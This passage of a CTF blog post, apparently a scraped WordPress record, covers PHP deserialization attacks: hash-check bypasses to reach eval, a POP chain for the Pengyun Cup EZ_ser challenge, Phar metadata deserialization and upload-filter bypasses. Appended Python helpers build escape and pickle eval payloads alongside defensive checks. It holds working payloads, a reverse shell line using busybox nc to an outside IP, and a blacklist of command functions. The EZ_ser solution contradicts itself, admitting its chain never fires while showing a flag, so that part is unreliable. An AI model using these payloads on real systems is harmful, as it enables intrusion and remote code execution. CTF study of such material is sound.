 highlight_file(__FILE__);<br>}<\/pre>\n\n\n\n<p>Two strict hash comparisons have to be bypassed, and in the end we need to get code into <code>eval<\/code>.<\/p>\n\n\n\n<p>Obviously the normal approaches won't work, but a built-in class does.<\/p>\n\n\n\n<p>As before, when <code>md5()<\/code> and <code>sha1()<\/code> are given an object they call its <code>__toString<\/code> method.<\/p>\n\n\n\n<p>First a quick look at what that string is:<\/p>\n\n\n\n<p>Error: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:2 Stack trace: #0 {main} Error: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:2 Stack trace: #0 {main} Exception: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:3 Stack trace: #0 {main} Exception: payload in D:\\phpstudy_pro\\WWW\\csysl_hash.php:3 Stack trace: #0 {main}<\/p>\n\n\n\n<p>The string these two built-in classes produce contains only the class name, the message, the file and the line, so two instances created on the same line stringify identically, while <code>!=<\/code> (a loose comparison of the objects' properties) still sees the different <code>code<\/code> values. This is what we use to bypass the hash functions; the one thing to remember is that both objects must be created on the same line.<\/p>\n\n\n\n<p>A quick test confirms that this bypasses both the strict and the loose hash comparison:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$a = new Error(\"payload\",1);$b = new Error(\"payload\",2);<br>if ($a!=$b){<br>    echo '$a != $b'.\"\\n\";<br>}<br>if (md5($a)===md5($b)){<br>    echo \"md5 equal\\n\";<br>}<br>if (sha1($a)===sha1($b)){<br>    echo \"sha1 equal\";<br>}<br>\/\/ $a != $b md5 equal sha1 equal<\/pre>\n\n\n\n<p>So the bypass works, and the remaining job is clear.<\/p>\n\n\n\n<p>Because of the filter (no <code>&lt;?php<\/code>, no parentheses, no quotes), the code is delivered through file inclusion: it executes <code>&lt;?=include 'flag.txt'?&gt;<\/code> (local test). The quotes are avoided by writing the filename as the bitwise NOT of its bytes, <code>~\"\\x99\\x93\\x9e\\x98\\xd1\\x8b\\x87\\x8b\"<\/code> = <code>flag.txt<\/code>, and the leading <code>?&gt;<\/code> closes the PHP block that <code>eval<\/code> opened so that the short echo tag can be used.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>class SYCLOVER {<br>    public $syc;<br>    public $lover;<br>}<br>$str = \"?&gt;&lt;?=include~\".urldecode(\"%99%93%9E%98%D1%8B%87%8B\").\"?&gt;\";<br>$a=new Error($str,1);$b=new Error($str,2);<br>$c = new SYCLOVER();<br>$c-&gt;syc = $a;<br>$c-&gt;lover = $b;<br>echo(urlencode(serialize($c)));<br><br>?&gt;<br>\/\/O%3A8%3A%22SYCLOVER%22%3A2%3A%7Bs%3A3%3A%22syc%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A23%3A%22%3F%3E%3C%3F%3Dinclude%7E%99%93%9E%98%D1%8B%87%8B%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A1%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A34%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Ccsysl_hash.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A7%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN%3B%7Ds%3A5%3A%22lover%22%3BO%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A23%3A%22%3F%3E%3C%3F%3Dinclude%7E%99%93%9E%98%D1%8B%87%8B%3F%3E%22%3Bs%3A13%3A%22%00Error%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A2%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A34%3A%22D%3A%5Cphpstudy_pro%5CWWW%5Ccsysl_hash.php%22%3Bs%3A7%3A%22%00%2A%00line%22%3Bi%3A7%3Bs%3A12%3A%22%00Error%00trace%22%3Ba%3A0%3A%7B%7Ds%3A15%3A%22%00Error%00previous%22%3BN
%3B%7D%7D<\/pre>\n\n\n\n<p><strong>Warning<\/strong>: Use of undefined constant \ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd - assumed '\ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd' (this will throw an Error in a future version of PHP) in <strong>D:\\phpstudy_pro\\WWW\\ysl_hash.php(8) : eval()'d code<\/strong> on line <strong>1<\/strong> flag{is_123}1 in D:\\phpstudy_pro\\WWW\\csysl_hash.php:7 Stack trace: #0 {main}<\/p>\n\n\n\n<p>And there is the flag.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u9e4f\u4e91\u676f (Pengyun Cup): EZ_ser<\/h3>\n\n\n\n<p>Slightly modified from the original challenge.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br><br>class DataBaseCon{<br>    public $user;<br>    public $hello;<br>    public function __invoke()<br>    {<br>        ($this-&gt;user)-&gt;lover($this-&gt;hello);<br>    }<br><br>}<br><br>class FileHandle{<br>    public $lover;<br>    public function __toString()<br>    {<br>        $func=$this-&gt;lover;<br>        $func();<br>        return \"\";<br>    }<br>}<br><br>class WafWaf{<br>    public $a;<br>    public $b;<br>    public $c;<br>    public $d;<br>    public function __call($func,$args)<br>    {<br>        if(!preg_match(\"\/exec|system|shell_exec|popens|popen|curl_exec|curl_multi_exec|proc_open|proc_POST_status|readfile|unlink|dl|memory_POST_usage|passthru|pcntl_exec|mail|imap_open|imap_mail|putenv|ini_set|apache_setenv|symlink|linkopen_basedir|eval|assert|create_function|array_map|call_user_func_array|array_filter|uasort|preg_replace\/i\", $this-&gt;b)){<br>            $a=new $args[0]($this-&gt;b);<br>            $c=$this-&gt;c;<br>            $a-&gt;$c($this-&gt;d);<br>        }<br>        else {<br>            die(\"waf\");<br>        }<br>    }<br>}<br><br><br>class WebInfo{<br>    public $web;<br>    public $syc;<br>    public $lover;<br>    public function  __wakeup()<br>    {<br>        if( ($this-&gt;syc != $this-&gt;lover) &amp;&amp; (md5($this-&gt;syc) === md5($this-&gt;lover)) &amp;&amp; (sha1($this-&gt;syc)=== sha1($this-&gt;lover)) )<br>        {<br><br>            eval($this-&gt;syc);<br>        }<br>    }<br>}<br><br>if (isset($_GET['pop'])){<br>    unserialize($_GET['pop']);<br>} else {<br>    highlight_file(__FILE__);<br>}<\/pre>\n\n\n\n<p>The chain the classes offer: <code>FileHandle::__toString<\/code> calls <code>$this-&gt;lover()<\/code>, so with a <code>DataBaseCon<\/code> there its <code>__invoke<\/code> runs <code>$this-&gt;user-&gt;lover($this-&gt;hello)<\/code>; <code>lover<\/code> does not exist on <code>WafWaf<\/code>, so <code>__call<\/code> builds <code>new $args[0]($this-&gt;b)<\/code> and calls method <code>$this-&gt;c<\/code> on it with <code>$this-&gt;d<\/code>. With <code>hello = ReflectionFunction<\/code>, <code>b = highlight_file<\/code>, <code>c = invoke<\/code> and <code>d = flag<\/code> that is <code>(new ReflectionFunction('highlight_file'))-&gt;invoke('flag')<\/code>, and <code>highlight_file<\/code> is not in the blacklist.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br><br>class DataBaseCon { public $user; public $hello; }<br>class FileHandle  { public $lover; }<br>class WafWaf      { public $a; public $b; public $c; public $d; }<br>class WebInfo     { public $web; public $syc; public $lover; }<br><br>$waf = new WafWaf();<br>$waf-&gt;b = \"highlight_file\";<br>$waf-&gt;c = \"invoke\";<br>$waf-&gt;d = \"flag\";<br><br>$db = new DataBaseCon();<br>$db-&gt;user  = $waf;<br>$db-&gt;hello = \"ReflectionFunction\"; \/\/ reflection class wrapping a function<br><br>$file = new FileHandle();<br>$file-&gt;lover = $db;<br><br>$web = new WebInfo();<br>$web-&gt;web   = $file;<br>$web-&gt;syc   = [0,2];<br>$web-&gt;lover = [0,1];<br><br>echo serialize($web);<\/pre>\n\n\n\n<p>Two things to keep in mind about <code>WebInfo::__wakeup<\/code>: it never reads <code>$this-&gt;web<\/code>, so the <code>__toString<\/code> chain only starts if something in <code>__wakeup<\/code> string-converts a <code>FileHandle<\/code> (a <code>!=<\/code> against a string, or the hash calls, do that for objects), and the two arrays pass the hash check only because <code>md5()<\/code> and <code>sha1()<\/code> return NULL for an array on PHP 7 (with a warning; PHP 8 throws a TypeError instead).<\/p>\n\n\n\n<p><strong>Warning<\/strong>: Use of undefined constant \ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd - assumed '\ufffd\ufffd\ufffd\ufffd\u044b\ufffd\ufffd' (this will throw an Error in a future version of PHP) in <strong>D:\\phpstudy_pro\\WWW\\pyb_ser.php(51) : eval()'d code<\/strong> on line <strong>1<\/strong> flag{is_123}1 in D:\\phpstrom-php\\php\u4ee3\u7801\\error.php:48 Stack trace: #0 {main}<\/p>\n\n\n\n<h2 
class=\"wp-block-heading\">WAF bypass<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">Phar deserialization<\/h2>\n\n\n\n<p>Phar is PHP's archive format, the PHP analogue of a JAR: several files are stored in one file, and PHP can access them and execute the code inside without unpacking anything.<\/p>\n\n\n\n<p>Requires PHP 5.3 or later.<\/p>\n\n\n\n<p>A Phar has four parts:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">1. Stub       \/\/ file header<br>2. manifest   \/\/ archive metadata<br>3. contents   \/\/ the archived files<br>4. signature  \/\/ signature<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Stub<\/h3>\n\n\n\n<p>The Stub identifies the file as a Phar; think of it as the Phar file header. It is simply a small PHP file with a required shape:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">xxx&lt;?php xxx; __HALT_COMPILER();?&gt; \/\/ anything may precede it, but it must end with __HALT_COMPILER(); or the phar extension will not recognise the file as a Phar<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">manifest<\/h3>\n\n\n\n<p>Stores the attributes, permissions and other information of the archived files. This is also the deserialization attack surface, because the user-defined meta-data is stored here in serialized form.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">contents<\/h3>\n\n\n\n<p>The contents of the archived files.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">signature<\/h3>\n\n\n\n<p>Signature (optional), located at the end of the file.<\/p>\n\n\n\n<p>Per the official documentation, the flag at the end of the signature says which hash was used: <code>01<\/code> MD5, <code>02<\/code> SHA-1, <code>04<\/code> SHA-256, <code>08<\/code> SHA-512.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Exploitation<\/h3>\n\n\n\n<p>Because a Phar stores the user-defined <code>meta-data<\/code> in serialized form, PHP's <code>phar_parse_metadata<\/code> calls <code>php_var_unserialize<\/code> when it parses the metadata.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Phar deserialization goes through the same unserializer, so __wakeup, __destruct and the other magic methods fire as usual;<br>the difference is that it happens without any call to unserialize() in the application.<\/pre>\n\n\n\n<p>A large part of PHP's filesystem functions unserialize the meta-data when they resolve a phar file through the <code>phar:\/\/<\/code> stream wrapper; essentially every file function that accepts a stream wrapper can trigger it. (Since PHP 8.0 the metadata is no longer unserialized automatically when the archive is opened, only on <code>Phar::getMetadata()<\/code>, so this applies to PHP 5.3 through 7.4.)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img src=\"https:\/\/sun1028.top\/wp-content\/uploads\/2025\/03\/image-20250319171329613-1024x310.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>Preconditions:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">1. The phar file can be uploaded to the server.<br>2. There is a usable magic method to serve as the \"springboard\".<br>3. The argument of a file operation function is controllable, and special characters such as `:`, `\/` and `phar` are not filtered.<\/pre>\n\n\n\n<p>An example:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>    class TestObject {<br><br>    }<br><br>    $phar = new Phar(\"phar.phar\"); \/\/ the extension must be .phar here<br>    $phar-&gt;startBuffering(); \/\/ start buffering<br>    $phar-&gt;setStub(\"&lt;?php __HALT_COMPILER(); ?&gt;\"); \/\/ set the stub<br><br>    \/* optional *\/<br>    $o = new TestObject();<br>    $o -&gt; data='busybox nc 111.111.111.111 4444 -e \/bin\/sh';<br>    $phar-&gt;setMetadata($o); \/\/ store the custom meta-data in the manifest<br><br>    $phar-&gt;addFromString(\"test.txt\", \"test\"); \/\/ add a file to the archive<br>    \/\/ the signature is computed automatically<br>    $phar-&gt;stopBuffering(); \/\/ stop buffering<br>?&gt;<\/pre>\n\n\n\n<p>Importantly, remember to edit your <code>php.ini<\/code> and set the <code>phar.readonly<\/code> line to Off, removing the leading semicolon, which acts as a comment marker there.<\/p>\n\n\n\n<p>Note: the uploaded file does not need a .phar extension, so the upload itself is not the hard part (the phar wrapper parses the file as a Phar regardless of its name).<\/p>\n\n\n\n<p>The first step of the attack is therefore uploading the phar file.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Bypasses<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">Format<\/h4>\n\n\n\n<p>Step one is getting the Phar onto the server; if the upload is protected, the file format has to be changed.<\/p>\n\n\n\n<p>For example, when only gif files may be uploaded.<\/p>\n\n\n\n<p>PHP recognises a Phar by the <code>__HALT_COMPILER();<\/code> in the <code>Stub<\/code> and imposes no other restriction.<\/p>\n\n\n\n<p>So after changing the extension or the file name the file is still a Phar; the extension is not a concern.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Bypassing a phar keyword filter<\/h4>\n\n\n\n<pre class=\"wp-block-preformatted\">if (preg_match(\"\/^php|^file|^phar|^dict|^zip\/i\",$filename)){<br>    die();<br>}<\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\">Bypass by putting another wrapper in front (the anchored regex only checks the start of the string; note that php:\/\/filter is itself caught by ^php in the example above and helps when only phar is filtered)<br>1. php:\/\/filter<br>php:\/\/filter\/read=convert.base64-encode\/resource=phar:\/\/test.phar<br><br>2. compress.bzip2<br>compress.bzip2:\/\/phar:\/\/\/test.phar\/test.txt<br><br>3. compress.zlib<br>compress.zlib:\/\/phar:\/\/\/home\/sx\/test.phar\/test.txt<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Bypassing a <code>__HALT_COMPILER<\/code> check<\/h3>\n\n\n\n<p>Prepend an image header to the stub:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">$phar-&gt;setStub(\"GIF89a&lt;?php __HALT_COMPILER();?&gt;\");<\/pre>\n\n\n\n<p>The serialized payload can also be written into the comment of a zip archive: the phar wrapper reads zip-based archives and uses the archive comment as the metadata.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?php<br>$a = serialize($a); \/\/ $a: the gadget object, e.g. the TestObject from above<br>$zip = new ZipArchive();<br>$res = $zip-&gt;open('phar.zip',ZipArchive::CREATE);<br>$zip-&gt;addFromString('flag.txt', 'flag is here');<br>$zip-&gt;setArchiveComment($a);<br>$zip-&gt;close();<br>?&gt;<\/pre>\n\n\n\n<p>Or gzip the generated Phar:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">gzip test.phar<br>\/\/ gzip &lt;name&gt;.phar<br>The compressed file is still deserialized.<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Exploitation: A deserialization vulnerability (Deserialization Vulnerability) is a security flaw that exists in the process in which an application 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1,2],"tags":[],"class_list":["post-133","post","type-post","status-publish","format-standard","hentry","category-ctf","category-web"],"_links":{"self":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/133","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=133"}],"version-history":[{"count":7,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/133\/revisions"}],"predecessor-version":[{"id":187,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/133\/revisions\/187"}],"wp:attachment":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=133"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=133"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=133"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
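The padding arithmetic in web262 and web264 is easy to get off by one, so here is an added Python helper (my own addition, not code from the original writeup or from ctfshow) that mimics serialize() for the page's message class, applies the server's str_replace, and then parses the result with a minimal unserialize() to show what message.php would read as token. The class layout (from, msg, to, token) and the fuck/loveU filter come from the page; the function names, the ASCII-only handling and the cut-down parser are assumptions of the example.

```python
# Added example (not from the original writeup): build and verify the
# str_replace length-escape payload used in web262/web264.
# Assumptions: the target's message class has the public properties
# from, msg, to, token (token defaults to 'user') in that order, and the
# server runs str_replace(FILTER_FROM, FILTER_TO, serialize($msg)).
# Strings are treated as ASCII; PHP counts bytes, so non-ASCII input
# would need byte lengths throughout.
from typing import Optional

FILTER_FROM = "fuck"
FILTER_TO = "loveU"
# Closes the `to` string, adds token=admin and closes the object.
INJECT = '";s:5:"token";s:5:"admin";}'


def php_serialize_message(f: str, m: str, t: str, token: str = "user") -> str:
    """Mimic serialize(new message($f,$m,$t)) for the page's message class."""
    def s(v: str) -> str:
        return 's:%d:"%s";' % (len(v), v)
    props = s("from") + s(f) + s("msg") + s(m) + s("to") + s(t) + s("token") + s(token)
    return 'O:7:"message":4:{%s}' % props


def repetitions_needed(inject: str, frm: str = FILTER_FROM, to: str = FILTER_TO) -> int:
    """Each replacement lengthens the string by len(to)-len(frm) bytes; the
    declared length must absorb exactly len(inject) bytes of growth."""
    gain = len(to) - len(frm)
    if gain <= 0:
        raise ValueError("the filter must make the string longer")
    if len(inject) % gain:
        raise ValueError("inject length must be a multiple of the gain per replacement")
    return len(inject) // gain


def build_payload(reps: Optional[int] = None, inject: str = INJECT) -> str:
    """Serialize as the server does, then apply the server's replacement."""
    if reps is None:
        reps = repetitions_needed(inject)
    t = FILTER_FROM * reps + inject
    return php_serialize_message("1", "2", t).replace(FILTER_FROM, FILTER_TO)


def php_unserialize(data: bytes):
    """Minimal unserialize() for N/i/b/s/a/O with public properties.  Like
    PHP it rejects a string whose declared length is wrong, and it ignores
    trailing bytes after the first complete value."""
    pos = 0

    def parse():
        nonlocal pos
        tag = data[pos:pos + 1]
        if tag == b"N":
            pos += 2
            return None
        if tag in (b"i", b"b"):
            end = data.index(b";", pos)
            v = int(data[pos + 2:end])
            pos = end + 1
            return bool(v) if tag == b"b" else v
        if tag == b"s":
            end = data.index(b":", pos + 2)
            n = int(data[pos + 2:end])
            start = end + 2                      # skip ':"'
            val = data[start:start + n]
            if data[start + n:start + n + 2] != b'";':
                raise ValueError("string length mismatch at offset %d" % pos)
            pos = start + n + 2
            return val.decode()
        if tag == b"a":
            end = data.index(b":", pos + 2)
            count = int(data[pos + 2:end])
            pos = end + 2                        # skip ':{'
            arr = {}
            for _ in range(count):
                k = parse()
                arr[k] = parse()
            pos += 1                             # '}'
            return arr
        if tag == b"O":
            end = data.index(b":", pos + 2)
            name_len = int(data[pos + 2:end])
            cls = data[end + 2:end + 2 + name_len].decode()
            pos = end + 2 + name_len + 2         # skip '":'
            end = data.index(b":", pos)
            count = int(data[pos:end])
            pos = end + 2                        # skip ':{'
            obj = {"__class__": cls}
            for _ in range(count):
                k = parse()
                obj[k] = parse()
            pos += 1                             # '}'
            return obj
        raise ValueError("unsupported tag %r at offset %d" % (tag, pos))

    return parse()


def escaped_token(reps: Optional[int] = None) -> Optional[str]:
    """What message.php would see as $msg->token; None if unserialize fails."""
    try:
        return php_unserialize(build_payload(reps).encode())["token"]
    except ValueError:
        return None
```

escaped_token() with the computed 27 repetitions yields admin; one repetition too few or too many makes the declared length of `to` wrong and the parse fails, which is exactly how PHP's unserialize() reacts (it returns false), so the count has to be exact.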
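For web277 and web278, an added Python example (my own, not from the original writeup) that builds the same __reduce__ gadget with a harmless expression, shows that a substring blacklist like web278's never sees anything in this payload, and contrasts it with an allowlisting Unpickler, which is the check that actually stops it. The pickle.loads(base64.b64decode(data)) sequence is the page's; the ALLOWED set and the function names are assumptions.

```python
# Added example (not from the original writeup): the web277/web278 gadget
# rebuilt with a harmless expression, next to the two checks that matter.
# Assumptions: the server runs pickle.loads(base64.b64decode(data)) as in
# /backdoor above; ALLOWED is a hypothetical allowlist.
import base64
import io
import pickle
import platform


class Cmd:
    """pickle calls eval(expr) while loading this object (via __reduce__)."""

    def __init__(self, expr: str):
        self.expr = expr

    def __reduce__(self):
        return (eval, (self.expr,))


def make_payload(expr: str) -> bytes:
    """Base64 payload exactly as /backdoor?data= expects it."""
    return base64.b64encode(pickle.dumps(Cmd(expr)))


def benign_payload() -> bytes:
    """A payload that needs no dangerous global: a plain set."""
    return base64.b64encode(pickle.dumps({1, 2}))


def naive_blacklist_hit(b64: bytes) -> bool:
    """The web278-style defence: look for 'os.system' in the raw pickle."""
    return b"os.system" in base64.b64decode(b64)


def unsafe_load(b64: bytes):
    """What the backdoor does: any global the stream names gets called."""
    return pickle.loads(base64.b64decode(b64))


class RestrictedUnpickler(pickle.Unpickler):
    """Allowlist-based loader: only the listed globals may be resolved."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def safe_load(b64: bytes):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(b64))).load()


def safe_load_rejects(b64: bytes) -> bool:
    try:
        safe_load(b64)
        return False
    except pickle.UnpicklingError:
        return True


def demo(expr: str = "__import__('platform').node()") -> dict:
    """Run the gadget through both loaders and the blacklist check."""
    p = make_payload(expr)
    return {
        "unsafe_result": unsafe_load(p),   # eval() ran: hostname of this machine
        "expected": platform.node(),
        "blacklist_hit": naive_blacklist_hit(p),
        "allowlist_rejects": safe_load_rejects(p),
    }
```

The reverse-shell payload from the writeup is the same gadget with a different expr; blacklisting function names in the bytes cannot keep up with `eval("__import__(...)")`, whereas find_class() is consulted for every global the stream references, so `builtins.eval` is refused before anything runs.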
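Turning the upload-bypass section around, here is an added Python classifier (my own addition, not part of the original post) that decides whether an uploaded blob is a Phar regardless of its name: it unwraps whole-file gzip or bzip2 compression, looks for the __HALT_COMPILER(); stub token with or without a GIF89a prefix, and inspects a zip archive's comment for a serialized object. The stub token and the zip-comment and compression tricks come from the page; the sample files are constructed inline and are not real Phar archives, and the function names are mine.

```python
# Added example (not from the original writeup): a server-side classifier
# for the upload-bypass tricks above, i.e. what a defender checks instead
# of the file extension.  Sample inputs are constructed inline.
import bz2
import gzip
import io
import re
import zipfile

# PHP finds the stub by this token; match loosely (case/whitespace) so an
# obfuscated stub is still flagged.
HALT_RE = re.compile(rb"__halt_compiler\s*\(\s*\)\s*;", re.IGNORECASE)
# Start of a serialized object / custom object (the O:+ WAF trick included).
PHP_OBJECT_RE = re.compile(rb'^\s*[OC]:\+?\d+:"')


def _unwrap(data: bytes) -> bytes:
    """Whole-archive gzip/bzip2 compression, which the phar wrapper undoes."""
    if data[:2] == b"\x1f\x8b":
        return gzip.decompress(data)
    if data[:3] == b"BZh":
        return bz2.decompress(data)
    return data


def classify_upload(data: bytes) -> str:
    body = _unwrap(data)
    if HALT_RE.search(body):
        return "phar"                     # stub present, whatever the name says
    if body[:4] == b"PK\x03\x04":
        with zipfile.ZipFile(io.BytesIO(body)) as zf:
            if PHP_OBJECT_RE.match(zf.comment):
                return "zip-with-serialized-comment"
        return "zip"
    return "other"


def sample_files() -> dict:
    """Constructed inputs (not real archives): enough bytes to exercise the checks."""
    stub_phar = b"GIF89a<?php __HALT_COMPILER(); ?>\r\n" + b"\x00" * 64 + b"GBMB"
    meta = b'O:10:"TestObject":1:{s:4:"data";s:4:"test";}'

    def make_zip(comment: bytes) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("flag.txt", "flag is here")
            zf.comment = comment          # written into the end-of-central-directory record
        return buf.getvalue()

    return {
        "gif_named_phar": stub_phar,
        "gzipped_phar": gzip.compress(stub_phar),
        "bzipped_phar": bz2.compress(stub_phar),
        "zip_comment_payload": make_zip(meta),
        "plain_zip": make_zip(b""),
        "real_gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16,
    }
```

An extension or magic-byte check passes every one of the first four samples; the stub token and the archive comment are the only properties the phar wrapper actually cares about, so those are what the upload handler has to look at.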